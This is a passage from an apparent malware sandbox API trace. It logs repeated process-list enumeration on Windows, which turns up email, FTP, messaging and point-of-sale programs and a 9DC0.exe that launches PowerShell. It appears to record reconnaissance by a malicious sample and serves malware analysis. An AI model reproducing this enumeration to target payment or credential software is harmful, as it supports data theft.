th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0181.198] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0181.201] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0181.203] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0181.206] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0181.209] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0181.212] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0181.214] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0181.216] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0181.219] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0181.223] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0181.225] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0181.227] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0181.230] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0181.278] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0181.280] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0181.283] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0181.285] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0181.303] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0181.305] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0181.308] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0181.310] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0181.313] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0181.316] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0181.318] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0181.322] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0181.324] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0181.325] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0181.326] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0181.367] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0181.369] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.371] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0181.373] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0181.375] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.377] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0181.378] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0181.380] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0181.382] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0181.384] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0181.385] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xdd8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0181.388] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0181.390] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0181.392] CloseHandle (hObject=0x17ec) returned 1 [0181.392] Sleep (dwMilliseconds=0x64) [0181.432] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0181.451] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0181.452] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0181.454] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0181.455] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.457] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0181.458] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0181.460] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0181.462] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0181.463] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0181.465] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.469] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.470] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0181.472] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.474] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.475] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.477] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.479] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.481] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.482] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.522] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0181.525] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0181.565] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.567] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0181.568] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.570] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0181.572] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0181.573] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0181.575] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0181.576] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0181.578] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0181.579] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.580] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.582] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0181.584] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.585] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0181.587] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.588] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0181.590] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0181.591] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0181.593] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0181.594] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, 